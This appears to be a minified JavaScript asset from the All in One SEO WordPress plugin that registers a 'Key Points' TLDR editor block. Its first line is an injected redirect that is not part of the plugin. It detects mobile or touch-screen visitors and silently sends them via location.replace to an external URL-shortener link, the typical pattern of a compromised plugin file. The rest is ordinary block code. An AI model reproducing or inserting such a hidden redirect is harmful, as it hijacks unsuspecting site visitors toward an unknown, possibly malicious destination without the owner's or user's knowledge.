(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{h as a,r as u}from"../js/utils.4347bc5f.js";import"../js/app-core.c8323d51.js";import{_ as p}from"../js/vendor-other.39e59221.js";import"../js/vendor-vue-ui.232c7c36.js";import"../js/vendor-lodash.03129cfe.js";const d="aioseo/key-points",m="AIOSEO - Key Points",f="Easily add an Too Long, Didn't Read (TLDR) to your content.",k="aioseo",g={},w={html:!1},y={name:d,title:m,description:f,category:k,attributes:g,supports:w},{InnerBlocks:b}=window.wp.blockEditor,{useEffect:H}=window.wp.element,{select:V,dispatch:r,subscribe:_}=window.wp.data;function v(n){const{className:i,clientId:o}=n;return H(()=>{const s=_(()=>{const e=V("core/block-editor").getBlocks(o).find(t=>t.name==="core/list");if(e){r("core/block-editor").selectBlock(e.clientId);const t=e.attributes.values;if(t){const c=t.indexOf("<li>")+4,l={clientId:e.clientId,start:c,end:c};r("core/block-editor").selectBlock(e.clientId,l)}s()}});return()=>s()},[o]),React.createElement("div",{className:i},React.createElement("div",{id:`aioseo-${o}`},React.createElement(b,{template:[["core/list"]],templateLock:"all"})))}const{InnerBlocks:E}=window.wp.blockEditor;function B({className:n}){return React.createElement("div",{className:n},React.createElement("div",{className:"aioseo-key-points-block-content"},React.createElement(E.Content,null)))}const I=a`
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 25 25"><path fillRule="evenodd" clipRule="evenodd" d="M4.125 4.5H20.125V20.5H4.125V4.5ZM9.71875 6.89062H17.7188V8.49062H9.71875V6.89062ZM17.7188 10.0781H9.71875V11.6781H17.7188V10.0781ZM9.71875 13.2661H17.7188V14.8661H9.71875V13.2661ZM17.7188 16.5H9.71875V18.1H17.7188V16.5ZM6.51562 6.89062H8.11562V8.49062H6.51562V6.89062ZM8.11562 10.0781H6.51562V11.6781H8.11562V10.0781ZM6.51562 13.2661H8.11562V14.8661H6.51562V13.2661ZM8.11562 16.5H6.51562V18.1H8.11562V16.5Z"/></svg>
`,R="all-in-one-seo-pack",{name:h,title:M,description:Z,category:O,supports:$,attributes:x}=y,A={title:M,description:Z,category:O,attributes:x,icon:I,example:{innerBlocks:[{name:"core/paragraph",attributes:{content:p("All in One SEO is perfect for business owners, bloggers, designers, developers, photographers, and basically everyone else. If you want to optimize your WordPress SEO, then you need to use All in One SEO Pack.",R)}}]},supports:$,edit:v,save:B};u({name:h,settings:A});
